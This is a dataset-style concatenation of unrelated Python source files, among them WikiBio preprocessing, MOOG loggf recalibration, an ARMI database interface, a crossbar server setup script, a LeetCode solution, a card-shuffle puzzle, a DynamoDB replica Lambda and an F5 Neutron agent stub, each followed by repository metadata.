with open(output_filename, mode='w', encoding='utf8') as f: for start, end in nwise(indices, n=2): f.write(' '.join(sentences[start:end]) + '\n') def create_tables(folder): """Here we create the tables.jl files used in PARENT metric We could optimize the code so that step is done in create_input but it's easier and more convienient to just add it there. """ for setname in ['train', 'valid', 'test']: input_filename = os.path.join(folder, 'full', f"{setname}_input.txt") with open(input_filename, mode="r", encoding="utf8") as f: # each line is a table. Each token is a value in the table. # We take the value/label of the token and discard the pos # given that they are written in the right order allvals = list() alllabs = list() for line in f: vals = list() labs = list() for token in line.strip().split(): val, lab, _, __ = token.split(DELIM) vals.append(val) labs.append(lab) allvals.append(vals) alllabs.append(labs) tables = list() for idx, (vals, labs) in enumerate(zip(allvals, alllabs)): table = list() for key, group in itertools.groupby(labs): size = len([_ for _ in group]) vvals, vals = vals[:size], vals[size:] table.append((key, vvals)) assert len(vals) == 0 # we exhausted all tokens tables.append(table) output_filename = os.path.join(folder, 'full', f"{setname}_tables.jl") with open(output_filename, mode="w", encoding="utf8") as f: for table in tables: f.write(json.dumps(table) + '\n') def preprocess(dataset_folder, destination_folder, args): """ We use a triple <f, p+, p-> to represent the field information of a token in the specific field. p+&p- are the position of the token in that field counted from the begining and the end of the field. For example, for a field (birthname, Jurgis Mikelatitis) in an infobox, we represent the field as (Jurgis, <birthname, 1, 2>) & (Mikelatitis, <birthname, 2, 1>) """ print("extracting token, field type and position info from original data ...") time_start = time.time() split_infobox(dataset_folder, destination_folder) reverse_pos(destination_folder) duration = time.time() - time_start print(f"extract finished in {duration:.3f} seconds") print("merging everything into single input file ...") time_start = time.time() create_input(destination_folder) duration = time.time() - time_start print(f"merge finished in {duration:.3f} seconds") print("extracting first sentences from original data ...") time_start = time.time() extract_sentences(dataset_folder, destination_folder, args.first_sentence) duration = time.time() - time_start print(f"extract finished in {duration:.3f} seconds") print("formatting input in human readable format ...") time_start = time.time() create_tables(destination_folder) duration = time.time() - time_start print(f"formatting finished in {duration:.3f} seconds") def make_dirs(folder): if not os.path.exists(folder): os.mkdir(folder) os.mkdir(os.path.join(folder, 'full')) os.mkdir(os.path.join(folder, "processed_data/")) os.mkdir(os.path.join(folder, "processed_data/train/")) os.mkdir(os.path.join(folder, "processed_data/test/")) os.mkdir(os.path.join(folder, "processed_data/valid/")) def main(args): make_dirs(args.dest) preprocess(dataset_folder, args.dest, args) if __name__ == '__main__': dataset_folder = pkg_resources.resource_filename(__name__, 'wikibio') parser = argparse.ArgumentParser() group = parser.add_argument_group('Destination path') group.add_argument('--dest', '-d', dest='dest', default=dataset_folder, help='Folder where to store the resulting files') parser.add_argument('--first_sentence', action='store_true', help="Activate to keep only the first sentence") main(parser.parse_args())
4,711
0
115
26cc0c3344909259086172abac7c8974633f63f8
6,039
py
Python
recalibration.py
DanielAndreasen/pymoog
1d4042705c5180a6e609d08e7455d3d893e86392
[ "MIT" ]
null
null
null
recalibration.py
DanielAndreasen/pymoog
1d4042705c5180a6e609d08e7455d3d893e86392
[ "MIT" ]
3
2015-01-31T15:36:38.000Z
2015-07-06T22:11:42.000Z
recalibration.py
DanielAndreasen/pymoog
1d4042705c5180a6e609d08e7455d3d893e86392
[ "MIT" ]
null
null
null
#!/usr/bin/env python # -*- coding: utf8 -*- # My imports from __future__ import division import numpy as np import pandas as pd import argparse from utils import _update_par as updateBatch from utils import _run_moog as runMoog from utils import Readmoog from interpolation import interpolator import os def solar_abundance(atom): '''Give atomic number and return solar abundance from Asplund et al. 2009 Input ----- atom : int The atomic number Output ------ abundance : float The solar abundance of the atom ''' if not isinstance(atom, int): raise ValueError('Atomic number need to be an integer') solar = [12.00, 10.93, 1.05, 1.38, 2.70, 8.43, 7.83, 8.69, 4.56, 7.93, 6.24, 7.60, 6.45, 7.51, 5.41, 7.12, 5.50, 6.40, 5.03, 6.34, 3.15, 4.95, 3.93, 5.64, 5.43, 7.47, 4.99, 6.22, 4.19, 4.56, 3.04, 3.65, 2.30, 3.34, 2.54, 3.25, 2.52, 2.87, 2.21, 2.58, 1.46, 1.88, -5.00, 1.75, 0.91, 1.57, 0.94, 1.71, 0.80, 2.04, 1.01, 2.18, 1.55, 2.24, 1.08, 2.18, 1.10, 1.58, 0.72, 1.42, -5.00, 0.96, 0.52, 1.07, 0.30, 1.10, 0.48, 0.92, 0.10, 0.84, 0.10, 0.85, -0.12, 0.85, 0.26, 1.40, 1.38, 1.62, 0.92, 1.17, 0.90, 1.75, 0.65, -5.00, -5.00, -5.00, -5.00, -5.00, -5.00, 0.02, -5.00, -0.54, -5.00, -5.00, -5.00] return solar[atom-1] def recalSingleLine(line, params=None, version=2014, maxiter=40, driver='abfind'): '''Recalibrate a single line and return the new loggf Inputs ------ line : list The line containing (wavelength, element, EP, loggf, EW) in that order params : list/tuple The parameters (Teff, logg, [Fe/H], vt) version : int The version of MOOG driver : str The MOOG driver to use (abfind or ewfind) Output ------ loggf : float The new recalibrated loggf ''' ewdriver = True if driver == 'ewfind' else False fmt = ('%9.3f', '%10.1f', '%9.2f', '%9.3f', '%28.1f') header = 'Wavelength ele EP loggf EW' np.savetxt('temporary.moog', line[:, np.newaxis].T, fmt=fmt, header=header) loggf_old = line[3] a, b = loggf_old-5, loggf_old+5 # extreme values of loggf c = (a+b)/2 for _ in range(maxiter): if c == 0: # Don't evaluate at loggf = 0 c += (abs(a) + abs(b)) / 10 fa = moogAbund(a, ewdriver=ewdriver) fc = moogAbund(c, ewdriver=ewdriver) if fc == 0: return c elif fa*fc < 0: b = c else: a = c c = (a+b)/2 return c if __name__ == '__main__': # pragma: no cover args = _parser() fname = args.input fout1 = 'rawLinelist/%s' % args.output fout2 = 'linelist/%s' % args.output.replace('.ares', '.moog') lines = pd.read_csv(fname, skiprows=2, delimiter=r'\s+', names=['WL', 'num', 'EP', 'loggf', 'ele', 'EW']) if args.parameters is None: params = [5777, 4.44, 0.00, 1.00] else: params = map(float, args.parameters) params[0] = int(params[0]) interpolator(params=params, atmtype=args.model, save=True) cols = ['WL', 'num', 'EP', 'loggf', 'EW'] fmt2 = ('%9.3f', '%10.1f', '%9.2f', '%9.3f', '%28.1f') header1 = 'WL num E.P. loggf ele EWsun\n' header1 += '------- ---- ---- ------ ---- -----' header2 = 'Wavelength ele EP loggf EW' x = lines[cols].values[0][:, np.newaxis].T np.savetxt('temporary.moog', x, fmt=fmt2, header=header2) options = {'driver': args.driver, 'damping': args.damping} updateBatch(line_list='temporary.moog', **options) newloggf = np.zeros(lines.shape[0]) for i, line in enumerate(lines[cols].values): print 'Wavelength: %.3f' % line[0] print 'Old loggf: %.3f' % line[3] zz = recalSingleLine(line, params=params, version=args.moogversion, driver=args.driver) zz = np.log10(zz) if zz > 0 else zz newloggf[i] = zz print 'New loggf: %.3f\n' % newloggf[i] lines['newloggf'] = pd.Series(newloggf) X = lines[['WL', 'num', 'EP', 'newloggf', 'ele', 'EW']] fmt1 = ('%7.2f', '%7.1f', '%9.2f', '%10.3f', '%10s', '%9.1f') print 'Saving results to: %s' % fout1 np.savetxt(fout1, X, fmt=fmt1, header=header1, comments='') X = lines[['WL', 'num', 'EP', 'newloggf', 'EW']] print 'Saving results to: %s' % fout2 np.savetxt(fout2, X, fmt=fmt2, header=header2) os.remove('temporary.moog')
37.04908
133
0.560689
#!/usr/bin/env python # -*- coding: utf8 -*- # My imports from __future__ import division import numpy as np import pandas as pd import argparse from utils import _update_par as updateBatch from utils import _run_moog as runMoog from utils import Readmoog from interpolation import interpolator import os def solar_abundance(atom): '''Give atomic number and return solar abundance from Asplund et al. 2009 Input ----- atom : int The atomic number Output ------ abundance : float The solar abundance of the atom ''' if not isinstance(atom, int): raise ValueError('Atomic number need to be an integer') solar = [12.00, 10.93, 1.05, 1.38, 2.70, 8.43, 7.83, 8.69, 4.56, 7.93, 6.24, 7.60, 6.45, 7.51, 5.41, 7.12, 5.50, 6.40, 5.03, 6.34, 3.15, 4.95, 3.93, 5.64, 5.43, 7.47, 4.99, 6.22, 4.19, 4.56, 3.04, 3.65, 2.30, 3.34, 2.54, 3.25, 2.52, 2.87, 2.21, 2.58, 1.46, 1.88, -5.00, 1.75, 0.91, 1.57, 0.94, 1.71, 0.80, 2.04, 1.01, 2.18, 1.55, 2.24, 1.08, 2.18, 1.10, 1.58, 0.72, 1.42, -5.00, 0.96, 0.52, 1.07, 0.30, 1.10, 0.48, 0.92, 0.10, 0.84, 0.10, 0.85, -0.12, 0.85, 0.26, 1.40, 1.38, 1.62, 0.92, 1.17, 0.90, 1.75, 0.65, -5.00, -5.00, -5.00, -5.00, -5.00, -5.00, 0.02, -5.00, -0.54, -5.00, -5.00, -5.00] return solar[atom-1] def recalSingleLine(line, params=None, version=2014, maxiter=40, driver='abfind'): '''Recalibrate a single line and return the new loggf Inputs ------ line : list The line containing (wavelength, element, EP, loggf, EW) in that order params : list/tuple The parameters (Teff, logg, [Fe/H], vt) version : int The version of MOOG driver : str The MOOG driver to use (abfind or ewfind) Output ------ loggf : float The new recalibrated loggf ''' def moogAbund(loggf, ewdriver=False): line[3] = loggf np.savetxt('temporary.moog', line[:, np.newaxis].T, fmt=fmt, header=header) runMoog() if ewdriver: d = np.loadtxt('summary.out', skiprows=5, usecols=(6,)) out = d-line[4] else: m = Readmoog(params=params, version=version) _, abund = m.elements() solar = solar_abundance(int(line[1])) out = round(abund[0] - solar, 3) return out ewdriver = True if driver == 'ewfind' else False fmt = ('%9.3f', '%10.1f', '%9.2f', '%9.3f', '%28.1f') header = 'Wavelength ele EP loggf EW' np.savetxt('temporary.moog', line[:, np.newaxis].T, fmt=fmt, header=header) loggf_old = line[3] a, b = loggf_old-5, loggf_old+5 # extreme values of loggf c = (a+b)/2 for _ in range(maxiter): if c == 0: # Don't evaluate at loggf = 0 c += (abs(a) + abs(b)) / 10 fa = moogAbund(a, ewdriver=ewdriver) fc = moogAbund(c, ewdriver=ewdriver) if fc == 0: return c elif fa*fc < 0: b = c else: a = c c = (a+b)/2 return c def _parser(): parser = argparse.ArgumentParser(description='Recalibrate the loggf for a set of settings') parser.add_argument('input', help='Input linelist from rawLinelist folder') parser.add_argument('output', help='Name of output file (saved in rawLinelist)') parser.add_argument('-m', '--model', help='Model atmosphere', default='kurucz95', choices=['kurucz95', 'apogee_kurucz', 'marcs']) parser.add_argument('-v', '--moogversion', help='MOOG version', default=2014) parser.add_argument('-d', '--damping', help='Damping to be used in MOOG', default=1, choices=map(str, [1, 2])) parser.add_argument('-dr', '--driver', help='Which driver to use', default='abfind', choices=['abfind', 'ewfind']) parser.add_argument('-p', '--parameters', help='Atmospheric parameters, Teff, logg, [Fe/H], vt', nargs='+', default=None) args = parser.parse_args() return args if __name__ == '__main__': # pragma: no cover args = _parser() fname = args.input fout1 = 'rawLinelist/%s' % args.output fout2 = 'linelist/%s' % args.output.replace('.ares', '.moog') lines = pd.read_csv(fname, skiprows=2, delimiter=r'\s+', names=['WL', 'num', 'EP', 'loggf', 'ele', 'EW']) if args.parameters is None: params = [5777, 4.44, 0.00, 1.00] else: params = map(float, args.parameters) params[0] = int(params[0]) interpolator(params=params, atmtype=args.model, save=True) cols = ['WL', 'num', 'EP', 'loggf', 'EW'] fmt2 = ('%9.3f', '%10.1f', '%9.2f', '%9.3f', '%28.1f') header1 = 'WL num E.P. loggf ele EWsun\n' header1 += '------- ---- ---- ------ ---- -----' header2 = 'Wavelength ele EP loggf EW' x = lines[cols].values[0][:, np.newaxis].T np.savetxt('temporary.moog', x, fmt=fmt2, header=header2) options = {'driver': args.driver, 'damping': args.damping} updateBatch(line_list='temporary.moog', **options) newloggf = np.zeros(lines.shape[0]) for i, line in enumerate(lines[cols].values): print 'Wavelength: %.3f' % line[0] print 'Old loggf: %.3f' % line[3] zz = recalSingleLine(line, params=params, version=args.moogversion, driver=args.driver) zz = np.log10(zz) if zz > 0 else zz newloggf[i] = zz print 'New loggf: %.3f\n' % newloggf[i] lines['newloggf'] = pd.Series(newloggf) X = lines[['WL', 'num', 'EP', 'newloggf', 'ele', 'EW']] fmt1 = ('%7.2f', '%7.1f', '%9.2f', '%10.3f', '%10s', '%9.1f') print 'Saving results to: %s' % fout1 np.savetxt(fout1, X, fmt=fmt1, header=header1, comments='') X = lines[['WL', 'num', 'EP', 'newloggf', 'EW']] print 'Saving results to: %s' % fout2 np.savetxt(fout2, X, fmt=fmt2, header=header2) os.remove('temporary.moog')
1,357
0
50
1b7145ed8bd88d7082cc74667eb42dcf2d744fe3
3,103
py
Python
armi/bookkeeping/db/database.py
celikten/armi
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
[ "Apache-2.0" ]
1
2021-05-29T16:02:31.000Z
2021-05-29T16:02:31.000Z
armi/bookkeeping/db/database.py
celikten/armi
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
[ "Apache-2.0" ]
null
null
null
armi/bookkeeping/db/database.py
celikten/armi
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
[ "Apache-2.0" ]
null
null
null
# Copyright 2019 TerraPower, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import Generator, Tuple from armi.settings import caseSettings from armi.reactor import systemLayoutInput class Database: """Abstract class defining the common interface for all Database implementations. Notes ----- This is a pretty anemic set of interfaces, since the different implementations can vary wildly. For now these are the bare minimum interfaces that should be needed to convert one Database format to another, and serve as a common ancestor.""" # Cannot annotate type, because cannot import blueprints, because blueprints cannot # be imported until after plugins are registered, and this module gets imported by # plugins as they are being registered. def genTimeSteps(self) -> Generator[Tuple[int, int], None, None]: """Get a sequence of tuples (cycle, node) that are contained in the database.""" raise NotImplementedError() def genAuxiliaryData(self, ts: Tuple[int, int]) -> Generator[str, None, None]: """ Get a sequence of auxiliary dataset/group names for the passed time step. Returns ------- Generator[str] A generator that produces **absolute** paths to the auxiliary data. Absolute names make it easier for a database version-agnostic converter to find the actual data. """ raise NotImplementedError() def getAuxiliaryDataPath(self, ts: Tuple[int, int], name: str) -> str: """ Get a string describing a path to an auxiliary data location. Parameters ---------- ts The time step that the auxiliary data belongs to name The name of the auxiliary data Returns ------- str An absolute location for storing auxiliary data with the given name for the given time step """ raise NotImplementedError()
34.865169
88
0.682565
# Copyright 2019 TerraPower, LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from typing import Generator, Tuple from armi.settings import caseSettings from armi.reactor import systemLayoutInput class Database: """Abstract class defining the common interface for all Database implementations. Notes ----- This is a pretty anemic set of interfaces, since the different implementations can vary wildly. For now these are the bare minimum interfaces that should be needed to convert one Database format to another, and serve as a common ancestor.""" def loadCS(self) -> caseSettings.Settings: raise NotImplementedError() # Cannot annotate type, because cannot import blueprints, because blueprints cannot # be imported until after plugins are registered, and this module gets imported by # plugins as they are being registered. def loadBlueprints(self): raise NotImplementedError() def loadGeometry(self) -> systemLayoutInput.SystemLayoutInput: raise NotImplementedError() def genTimeSteps(self) -> Generator[Tuple[int, int], None, None]: """Get a sequence of tuples (cycle, node) that are contained in the database.""" raise NotImplementedError() def genAuxiliaryData(self, ts: Tuple[int, int]) -> Generator[str, None, None]: """ Get a sequence of auxiliary dataset/group names for the passed time step. Returns ------- Generator[str] A generator that produces **absolute** paths to the auxiliary data. Absolute names make it easier for a database version-agnostic converter to find the actual data. """ raise NotImplementedError() def getAuxiliaryDataPath(self, ts: Tuple[int, int], name: str) -> str: """ Get a string describing a path to an auxiliary data location. Parameters ---------- ts The time step that the auxiliary data belongs to name The name of the auxiliary data Returns ------- str An absolute location for storing auxiliary data with the given name for the given time step """ raise NotImplementedError() def writeInputsToDB(self, cs, csString=None, geomString=None, bpString=None): raise NotImplementedError() def readInputsFromDB(self): raise NotImplementedError() def writeToDB(self, reactor, statePointName=None): raise NotImplementedError() def close(self): raise NotImplementedError()
404
0
188
eb785d59f66731316d04178e89fe3c2b7adfe88a
7,697
py
Python
src/kogniserver/adm.py
aleneum/rsb-wamp-bridge
4c6401f9f1997294b5891fa814e700986612ebdb
[ "MIT" ]
null
null
null
src/kogniserver/adm.py
aleneum/rsb-wamp-bridge
4c6401f9f1997294b5891fa814e700986612ebdb
[ "MIT" ]
2
2016-08-05T13:52:45.000Z
2016-08-05T14:16:42.000Z
src/kogniserver/adm.py
aleneum/kogniserver
4c6401f9f1997294b5891fa814e700986612ebdb
[ "MIT" ]
null
null
null
import argparse from os import makedirs from os.path import abspath, exists, join, dirname, expanduser import re import subprocess import time import json import threading import socket import sys CONFIG_JSON = """ { "version": 2, "controller": {}, "workers": [ { "transports": [ { "paths": { "ws": { "type": "websocket" }, "/": { "directory": ".", "type": "static" }, "proto": { "directory": ".", "type": "static" } }, "endpoint": { "type": "tcp", "port": 8181, "tls": { "key": "server.key", "certificate": "server.crt" } }, "type": "web" } ], "type": "router", "options": { "pythonpath": [""] }, "realms": [ { "name": "realm1", "roles": [ { "name": "anonymous", "permissions": [ { "uri": "", "match": "prefix", "allow": { "call": true, "register": true, "publish": true, "subscribe": true }, "disclose": { "caller": false, "publisher": false }, "cache": true } ] } ] } ] } ] } """ if __name__ == '__main__': main_entry()
33.176724
121
0.509809
import argparse from os import makedirs from os.path import abspath, exists, join, dirname, expanduser import re import subprocess import time import json import threading import socket import sys def run_crossbar(config_path, keep_alive): ret = subprocess.call(['crossbar', 'status']) if ret == 0 and not keep_alive: subprocess.call(['crossbar', 'stop']) if ret != 0 or not keep_alive: cmd = ['crossbar', 'start', '--config=%s' % config_path] subprocess.call(cmd) def main_entry(args=None): parser = argparse.ArgumentParser() parser.add_argument('-f', '--force', help='overwrite config file if it already exists', action='store_true') parser.add_argument('-k', '--keep-alive', help='use existing crossbar instance', action='store_true') parser.add_argument('-c', '--config', help='location of the config file') parser.add_argument('-g', '--generate', help='only generate config file (with default options)', action='store_true') args = sys.argv[1:] if args is None else args args = parser.parse_args(args) pwd = abspath(__file__) elems = re.compile('[\\\\/]+').split(pwd) if 'site-packages' in elems: idx = elems.index('site-packages') elems = elems[:idx-2] else: elems = elems[:-1] prefix = join("/", *elems) serve_path = join(prefix, "var/www/kogniserver") config_path = join(prefix, 'etc/crossbar/config.json') if not args.config else args.config choice = 'n' if exists(config_path) is False: input_valid = False if not args.generate else True while not input_valid: choice = raw_input("config.json for crossbar does not exists. Should a default one be created " "at %s? [y]/n:" % config_path) or 'y' if choice not in ['y', 'n']: print("please enter 'y' or 'n'.") else: input_valid = True if choice in 'y' or args.force: input_valid = False if not args.generate else True while not input_valid: serve_path = raw_input("Please enter the directory from which " "files should be served [%s]:" % serve_path) or serve_path serve_path = expanduser(serve_path) if not exists(serve_path): choice = raw_input("%s does not exist. Should it be created? [y]/n: " % serve_path) or 'y' if choice not in ['y', 'n']: print("please enter 'y' or 'n'.") elif choice == 'y': makedirs(serve_path) input_valid = True else: input_valid = True protopath = join(prefix, 'share/rst0.17/proto') input_valid = False if not args.generate else True while not input_valid: protopath = raw_input("Location of proto-files? [%s]:" % protopath) or protopath if not exists(protopath) and not args.generate: choice = raw_input("%s does not exist! " "Do you want to ommit RST in your configuration? [y]/n:" % protopath) or 'y' if choice not in ['y', 'n']: print("please enter 'y' or 'n'.") if choice =='y': input_valid = True protopath = None else: input_valid = True if exists(config_path) and not args.force: print "Config file already exists! Use --force to overwrite." return else: if not exists(dirname(abspath(config_path))): makedirs(dirname(abspath(config_path))) ssl_cert = False input_valid = False if not args.generate else True while not input_valid: ssl_cert = raw_input("Location of TLS certificate (without .crt and .key) if needed. " "Leave empty if not needed:") or ssl_cert input_valid = True if ssl_cert: if not exists(ssl_cert + ".crt"): print("%s does not exist!" % (ssl_cert + ".crt")) input_valid = True ssl_cert = False with open(config_path, 'w') as target: j = json.loads(CONFIG_JSON) paths = j['workers'][0]['transports'][0] paths['paths']['/']['directory'] = serve_path if protopath: paths['paths']['proto']['directory'] = protopath else: del paths['paths']['proto'] if ssl_cert: paths['endpoint']['tls']['key'] = ssl_cert + '.key' paths['endpoint']['tls']['certificate'] = ssl_cert + '.crt' else: del paths['endpoint']['tls'] json.dump(j, target, indent=4) # In a dry generation run we can exit here if args.generate: return t1 = threading.Thread(target=run_crossbar, args=(config_path, args.keep_alive,)) t1.setDaemon(True) t1.start() while not check_server('localhost', 8181): time.sleep(0.5) with open(config_path) as crossbar_config: j = json.load(crossbar_config) ssl_cert = None if 'tls' in j['workers'][0]['transports'][0]['endpoint']: ssl_cert = j['workers'][0]['transports'][0]['endpoint']['tls']['certificate'] try: # async cannot deal with ssl yet and importing the runner # already sets the environment to asyncio if ssl_cert: raise RuntimeError from .async import main_entry as server_main_entry except RuntimeError: # will be used if a) twisted has been used before or if an ssl_cert should be used from .twist import main_entry as server_main_entry server_main_entry(ssl_cert) def check_server(address, port): # Create a TCP socket s = socket.socket() try: s.connect((address, port)) # print "Connected to %s on port %s" % (address, port) s.close() return True except socket.error, e: # print "Connection to %s on port %s failed: %s" % (address, port, e) return False CONFIG_JSON = """ { "version": 2, "controller": {}, "workers": [ { "transports": [ { "paths": { "ws": { "type": "websocket" }, "/": { "directory": ".", "type": "static" }, "proto": { "directory": ".", "type": "static" } }, "endpoint": { "type": "tcp", "port": 8181, "tls": { "key": "server.key", "certificate": "server.crt" } }, "type": "web" } ], "type": "router", "options": { "pythonpath": [""] }, "realms": [ { "name": "realm1", "roles": [ { "name": "anonymous", "permissions": [ { "uri": "", "match": "prefix", "allow": { "call": true, "register": true, "publish": true, "subscribe": true }, "disclose": { "caller": false, "publisher": false }, "cache": true } ] } ] } ] } ] } """ if __name__ == '__main__': main_entry()
5,950
0
69
d0fce2cb257f939d5dd37e46b222ea6b9fa3b758
369
py
Python
LeetcodeAlgorithms/315. Count of Smaller Numbers After Self/count-of-smaller-numbers-after-self.py
Fenghuapiao/PyLeetcode
d804a62643fe935eb61808196a2c093ea9583654
[ "MIT" ]
3
2019-08-20T06:54:38.000Z
2022-01-07T12:56:46.000Z
LeetcodeAlgorithms/315. Count of Smaller Numbers After Self/count-of-smaller-numbers-after-self.py
yhangf/PyLeetcode
d804a62643fe935eb61808196a2c093ea9583654
[ "MIT" ]
null
null
null
LeetcodeAlgorithms/315. Count of Smaller Numbers After Self/count-of-smaller-numbers-after-self.py
yhangf/PyLeetcode
d804a62643fe935eb61808196a2c093ea9583654
[ "MIT" ]
2
2018-11-01T16:10:34.000Z
2020-06-02T03:24:43.000Z
import bisect
26.357143
47
0.468835
import bisect class Solution(object): def countSmaller(self, nums): """ :type nums: List[int] :rtype: List[int] """ ans = [] bst = [] for num in reversed(nums): idx = bisect.bisect_left(bst, num) ans.append(idx) bisect.insort(bst, num) return ans[::-1]
0
333
22
8c8034428e29fd160cf8e41c0c7d98c8aa53bb4b
1,867
py
Python
10205/10205.py
Keilan/uva
4218328466c3ab2fdf34cdf45fc7a8dea90964bc
[ "MIT" ]
null
null
null
10205/10205.py
Keilan/uva
4218328466c3ab2fdf34cdf45fc7a8dea90964bc
[ "MIT" ]
null
null
null
10205/10205.py
Keilan/uva
4218328466c3ab2fdf34cdf45fc7a8dea90964bc
[ "MIT" ]
null
null
null
import sys shuffle()
28.723077
99
0.547938
import sys class Card: def __init__(self, rank, suit): self.rank = rank self.suit = suit @classmethod def from_position(cls, position): """ Given a number from 1 to 52, creates the card in the correct position assuming the deck is sorted by alphabetical suits and then in ace-high ranks. """ suits = ['Clubs', 'Diamonds', 'Hearts', 'Spades'] ranks = ['2', '3', '4', '5', '6', '7', '8', '9', '10', 'Jack', 'Queen', 'King', 'Ace'] suit = suits[(position-1) // 13] rank = ranks[(position-1) % 13] return cls(rank, suit) def __repr__(self): return '{} of {}'.format(self.rank, self.suit) def shuffle(): num_cases = int(sys.stdin.readline()) sys.stdin.readline() # Skip blank line for case_num in range(num_cases): if case_num != 0: print() # Blank line # Read input num_shuffles = int(sys.stdin.readline()) # Read shuffles shuffles = [] count = num_shuffles * 52 while count: data = [int(i) for i in sys.stdin.readline().split()] count -= len(data) shuffles.extend(data) shuffles = [shuffles[x:x+52] for x in range(0, len(shuffles), 52)] # Split into sets of 52 result = list(range(1, 52+1)) # Read shuffles to apply until we reach a blank line line = sys.stdin.readline() while not line.isspace() and line != '': shuffle = shuffles[int(line) - 1] # Apply the shuffle previous = result.copy() for i, new_position in enumerate(shuffle): result[i] = previous[new_position-1] line = sys.stdin.readline() # Print card names for idx in result: print(Card.from_position(idx)) shuffle()
1,243
553
46
4f1c141f04a988a04635609952303d8c99c330a8
1,275
py
Python
design-patterns/ddbreplica_lambda.py
weisisheng/amazon-dynamodb-labs
76b9b72b3d16bb7b93e313c48dc8efcd981e18f7
[ "Apache-2.0" ]
109
2020-01-17T05:24:10.000Z
2022-03-18T18:31:10.000Z
design-patterns/ddbreplica_lambda.py
weisisheng/amazon-dynamodb-labs
76b9b72b3d16bb7b93e313c48dc8efcd981e18f7
[ "Apache-2.0" ]
41
2020-01-22T21:18:08.000Z
2022-02-16T19:49:43.000Z
design-patterns/ddbreplica_lambda.py
weisisheng/amazon-dynamodb-labs
76b9b72b3d16bb7b93e313c48dc8efcd981e18f7
[ "Apache-2.0" ]
74
2020-01-16T23:07:46.000Z
2022-03-31T11:39:31.000Z
import json import time import urllib import boto3 import traceback from lab_config import boto_args from boto3.dynamodb.types import TypeDeserializer
29.651163
79
0.676863
import json import time import urllib import boto3 import traceback from lab_config import boto_args from boto3.dynamodb.types import TypeDeserializer class StreamTypeDeserializer(TypeDeserializer): def _deserialize_n(self, value): return int(value) def _deserialize_b(self, value): return value # Already in Base64 def get_table_name_from_arn(arn): return arn.split(':')[5].split('/')[1] def _lambda_handler(event, context): dynamodb = boto3.resource(**boto_args) dynamodb_table = dynamodb.Table('logfile_replica') ddb_deserializer = StreamTypeDeserializer() records = event['Records'] for record in records: ddb = record['dynamodb'] event_name = record['eventName'].upper() # INSERT, MODIFY, REMOVE if (event_name == 'INSERT') or (event_name == 'MODIFY'): if 'NewImage' not in ddb: print ('Cannot process stream if it does not contain NewImage') continue doc_fields = ddb_deserializer.deserialize({'M': ddb['NewImage']}) item = dynamodb_table.put_item(Item=doc_fields) def lambda_handler(event, context): try: return _lambda_handler(event, context) except Exception: print (traceback.format_exc())
954
26
144
803f3c5cd78d87ab3c97e23ccd0aab8fcc148c64
10,172
py
Python
networking_f5_ml2/plugins/ml2/drivers/mech_f5/agent/f5_agent.py
sapcc/networking-f5-ml2
03739c1362df80510739afbdc937b5ec68591c52
[ "Apache-2.0" ]
null
null
null
networking_f5_ml2/plugins/ml2/drivers/mech_f5/agent/f5_agent.py
sapcc/networking-f5-ml2
03739c1362df80510739afbdc937b5ec68591c52
[ "Apache-2.0" ]
null
null
null
networking_f5_ml2/plugins/ml2/drivers/mech_f5/agent/f5_agent.py
sapcc/networking-f5-ml2
03739c1362df80510739afbdc937b5ec68591c52
[ "Apache-2.0" ]
null
null
null
# Copyright 2016 SAP SE # # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import signal import time import eventlet eventlet.monkey_patch() from oslo_config import cfg from oslo_log import log as logging from neutron.i18n import _LI, _LW import oslo_messaging from oslo_service import loopingcall from neutron.agent.common import polling from neutron.common import config from neutron.agent import rpc as agent_rpc from neutron.common import constants as n_const from neutron.common import rpc as n_rpc from neutron.common import topics from neutron import context from neutron.i18n import _LE from neutron.db import db_base_plugin_v2 as db_base from neutron.plugins.ml2 import db as db_ml2 from networking_f5_ml2.plugins.ml2.drivers.mech_f5 import constants as f5_constants from oslo_utils import importutils LOG = logging.getLogger(__name__) cfg.CONF.import_group('ml2_f5', 'networking_f5_ml2.plugins.ml2.drivers.mech_f5.config')
36.855072
122
0.608238
# Copyright 2016 SAP SE # # All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import collections import signal import time import eventlet eventlet.monkey_patch() from oslo_config import cfg from oslo_log import log as logging from neutron.i18n import _LI, _LW import oslo_messaging from oslo_service import loopingcall from neutron.agent.common import polling from neutron.common import config from neutron.agent import rpc as agent_rpc from neutron.common import constants as n_const from neutron.common import rpc as n_rpc from neutron.common import topics from neutron import context from neutron.i18n import _LE from neutron.db import db_base_plugin_v2 as db_base from neutron.plugins.ml2 import db as db_ml2 from networking_f5_ml2.plugins.ml2.drivers.mech_f5 import constants as f5_constants from oslo_utils import importutils LOG = logging.getLogger(__name__) cfg.CONF.import_group('ml2_f5', 'networking_f5_ml2.plugins.ml2.drivers.mech_f5.config') class F5NeutronAgent(): target = oslo_messaging.Target(version='1.4') def __init__(self, quitting_rpc_timeout=None, conf=None, ): self.conf = cfg.CONF cfg.CONF.log_opt_values(LOG, logging.DEBUG) self.agent_conf = self.conf.get('AGENT', {}) 